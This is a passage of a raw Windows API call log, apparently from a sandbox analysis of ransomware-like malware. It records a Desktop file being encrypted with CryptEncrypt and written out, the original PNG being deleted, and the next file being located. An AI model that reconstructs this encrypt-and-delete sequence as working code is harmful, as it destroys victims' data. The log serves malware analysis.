RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0120.237] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0120.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8ef9) returned 0x4530d28 [0120.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0120.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cacd0 [0120.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cacd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.240] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x8ef9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x8f00) returned 1 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.240] CharLowerBuffW (in: lpsz="byte[36609]", cchLength=0xb | out: lpsz="byte[36609]") returned 0xb [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0120.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caf10 [0120.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.241] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4530d28*, pdwDataLen=0x144e790*=0x8ef9, dwBufLen=0x8f00 | out: pbData=0x4530d28*, pdwDataLen=0x144e790*=0x8f00) returned 1 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0120.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.241] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.241] WriteFile (in: hFile=0x2a0, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x8f00, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x8f00, lpOverlapped=0x0) returned 1 [0120.243] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0120.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca898, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0120.243] CryptDestroyKey (hKey=0x41ac280) returned 1 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.255] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.255] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.255] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.255] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0120.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0120.256] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0120.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0120.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0120.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.256] FreeLibrary (hLibModule=0x756e0000) returned 1 [0120.256] CloseHandle (hObject=0x258) returned 1 [0120.256] CloseHandle (hObject=0x2a0) returned 1 [0120.258] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png", lpFilePart=0x0) returned 0x2c [0120.258] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png" (normalized: "c:\\users\\fd1hvy\\desktop\\a2beonpxv2cn0bic.png")) returned 0x20 [0120.258] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73b60650, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xfe4a440, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xfe4a440, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x8ef9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="A2BeonpxV2cn0bIC.png", cAlternateFileName="A2BEON~1.PNG")) returned 0x41ac600 [0120.258] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png" (normalized: "c:\\users\\fd1hvy\\desktop\\a2beonpxv2cn0bic.png")) returned 1 [0120.262] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73b60650, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xfe4a440, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xfe4a440, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x8ef9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="A2BeonpxV2cn0bIC.png", cAlternateFileName="A2BEON~1.PNG")) returned 0 [0120.262] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0120.262] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0120.262] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0120.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0120.263] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0120.263] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0120.263] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.263] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.263] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864003a0, ftCreationTime.dwHighDateTime=0x1d5e0f1, ftLastAccessTime.dwLowDateTime=0xecc04980, ftLastAccessTime.dwHighDateTime=0x1d5e6ed, ftLastWriteTime.dwLowDateTime=0xecc04980, ftLastWriteTime.dwHighDateTime=0x1d5e6ed, nFileSizeHigh=0x0, nFileSizeLow=0x17a26, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="AQwif8E74Z.avi", cAlternateFileName="AQWIF8~1.AVI")) returned 0x41ac2c0 [0120.264] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0120.264] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.264] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0120.266] 